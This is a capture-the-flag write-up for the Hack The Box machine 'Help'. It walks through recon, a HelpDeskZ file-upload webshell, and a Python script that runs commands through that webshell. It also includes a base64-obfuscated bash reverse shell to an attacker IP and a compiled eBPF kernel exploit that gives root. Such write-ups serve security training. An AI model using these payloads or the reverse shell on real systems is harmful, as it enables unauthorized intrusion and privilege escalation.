# Help - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Help was a nice easy-rated HTB machine created by [ch4p](https://app.hackthebox.com/users/1)

For user, we abuse an arbitrary file upload to upload a PHP webshell.  
For root, we use a kernel exploit.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.121
Nmap scan report for 10.10.10.121
Host is up (0.089s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,3000 -oN help.nmap 10.10.10.121
Nmap scan report for 10.10.10.121
Host is up (0.087s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
 
Besides the SSH port (22) and the HTTP port (80), we also have port 3000.

The website on port 80 redirects us to <http://help.htb/>
Hence, we can add this line to `/etc/hosts`:

```
10.10.10.121 help.htb
```

The home page:

![1](images/1.png)

It is the default Apache page.  
I tried enumerating subdomains with `ffuf` but found none.  
I also tried enumerating routes with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u http://help.htb/FUZZ -mc all -fw 22,24 2>/dev/null
javascript              [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 85ms]
support                 [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 93ms]
.                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 88ms]
```

<http://help.htb/support/> is running HelpDeskZ, a help desk software. I could not deduce the version.

![2](images/2.png)

I tried `admin:admin` and basic SQL injection payloads on the login form, but they didn't work.  
Next, there is a "Submit a ticket" option. I attempted XSS with basic `<img>` and `<script>` payloads but didn't get a hit.

## Arbitrary File Upload

Googling "helpdeskz exploit", I found <https://www.exploit-db.com/exploits/40300>  
When "submitting" a ticket, the file uploaded is renamed to a predictable name. This script attempts to abuse that.  
But it's for `python 2` and isn't as precise.  
I decided to rewrite the exploit and make it more exact.  
Automating everything is not possible due to that captcha, but we can look at the response in Burp and guess the filename.

For the filepath, I wanted to take a look at the source code. The github repo mentioned on `exploit-db` is dead.  
Instead, I had to use <https://github.com/ViktorNova/HelpDeskZ>

I found the relevant code at <https://github.com/ViktorNova/HelpDeskZ/blob/master/controllers/submit_ticket_controller.php#L138>:

```php
$uploaddir = UPLOAD_DIR.'tickets/';     
if($_FILES['attachment']['error'] == 0){
    $ext = pathinfo($_FILES['attachment']['name'], PATHINFO_EXTENSION);
    $filename = md5($_FILES['attachment']['name'].time()).".".$ext;
    $fileuploaded[] = array('name' => $_FILES['attachment']['name'], 'enc' => $filename, 'size' => formatBytes($_FILES['attachment']['size']), 'filetype' => $_FILES['attachment']['type']);
    $uploadedfile = $uploaddir.$filename;
    if (!move_uploaded_file($_FILES['attachment']['tmp_name'], $uploadedfile)) {
        $show_step2 = true;
        $error_msg = $LANG['ERROR_UPLOADING_A_FILE'];
    }else{
        $fileverification = verifyAttachment($_FILES['attachment']);
        switch($fileverification['msg_code']){
            case '1':
            $show_step2 = true;
            $error_msg = $LANG['INVALID_FILE_EXTENSION'];
            break;
            case '2':
            $show_step2 = true;
            $error_msg = $LANG['FILE_NOT_ALLOWED'];
            break;
            case '3':
            $show_step2 = true;
            $error_msg = str_replace('%size%',$fileverification['msg_extra'],$LANG['FILE_IS_BIG']);
            break;
        }
    }
}
```

The `UPLOAD_DIR` is defined in <https://github.com/ViktorNova/HelpDeskZ/blob/72baa3563bf52ce73f29ea4dc0e08009c44c45a7/includes/global.php#L18>


```php
define('UPLOAD_DIR', ROOTPATH . 'uploads/');
```

`ROOTPATH` is also defined there:

```php
define('ROOTPATH', dirname(dirname(__FILE__)).'/');
```

So we can guess that our file got uploaded to <http://help.htb/support/uploads/tickets/{deducible_hash}.php>  
Next, I tried uploading the PHP file, but it came with the error: "File is not allowed."  
But the PoC clearly mentions a PHP filename.  

I thought it was a newer version and looked at `0xdf`'s write-up.  
The file is uploaded and renamed even before this check is performed, so we are good.

![3](images/3.png)

```py
from datetime import datetime, timezone
from hashlib import md5
from sys import argv
import requests


def datetime_to_epoch(dt_string):
    dt_object = datetime.strptime(dt_string, '%a, %d %b %Y %H:%M:%S %Z')
    dt_object = dt_object.replace(tzinfo=timezone.utc)

    return int(dt_object.timestamp())


def os_command(url, command):
    header = {"Accept-Language": command}
    r = requests.get(f"{url}", headers=header, proxies=proxy)

    return r.text


if __name__ == "__main__":
    proxy = {}
    # proxy['http'] = 'http://127.0.0.1:8080'

    rhost = "http://help.htb"
    filename = "opcode.php"

    timestamp = "Sun, 23 Jul 2023 17:39:49 GMT"
    epoch = datetime_to_epoch(timestamp)
    hash = md5(f"{filename}{epoch}".encode()).hexdigest()
    url = f"{rhost}/support/uploads/tickets/{hash}.php"

    result = os_command(url, argv[1])
    print(result)
```

```console
opcode@parrot$ python3 run_commands.py id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
```

Next, I got a reverse shell:

```console
opcode@parrot$ python3 run_commands.py 'echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTI4LzkwMDEgMD4mMScK | base64 -d | bash'
```

And stabilized it:

```console
help@help:/home/help$ python3 -c 'import pty;pty.spawn("/bin/bash");'
help@help:/home/help$ ^Z
opcode@parrot$ stty raw -echo; fg
help@help:/home/help$ export TERM=xterm-256color
help@help:/home/help$ exec /bin/bash
```

## Post-foothold enumeration

Now, there's much to explore, starting with the `node.js` application running on port 3000.  
But it is not running as root:

```console
help@help:/home/help$ netstat -tulnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::3000                 :::*                    LISTEN      768/nodejs      
tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
```

I tried to look for credentials there but couldn't find any.

Next, we also have SMTP port 25 available internally.  
A lot is happening in `/var/mail/help`, but I also saw `cron` somewhere.

We can transfer [pspy](https://github.com/DominicBreuker/pspy) to the box and monitor cron jobs.  
I waited for a long time but didn't find anything.

I also tried [duroc_hog](https://github.com/newrelic/rusty-hog) to search for credentials:

```console
help@help:/home/help$ ./duroc_hog help/src/
[
  {
    "stringsFound": [
      "helpme@helpme.com'"
    ],
    "path": "help/src/graphql/schema/resolvers/index.js",
    "reason": "Email address",
    "linenum": 1,
    "diff": "const user = { username:'helpme@helpme.com', password:'5d3c93182bb20f07b994a7f617e99cff' }"
  }
]
```

The password cracks on <https://crackstation.net/> to `godhelpmeplz`  
It isn't reused for users.

## Kernel exploit for privilege escalation

I couldn't find anything relevant, and took a peek at 0xdf's write-up for root as well. He has used a kernel exploit.  
If I run exploit suggester here, it would likely find dozens of kernel exploits, and most of them would work.  
Even the questions in guided mode suggest that kernel exploit is intended.

Therefore, we can transfer `linpeas.sh` and look at the `Exploit Suggester` section:

```text
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[--SNIP--]
```

I think any of these would work.  
We can try the first one:

```console
help@help:/home/help$ which gcc
/usr/bin/gcc
```

We do have `gcc` on the box.

```console
help@help:/home/help$ gcc 45010.c -o exploit
```

Finally, we can run the exploit:

```console
help@help:/home/help$ ./exploit 
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880039a46100
[*] Leaking sock struct from ffff88003905e400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880036974180
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880036974180
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
```
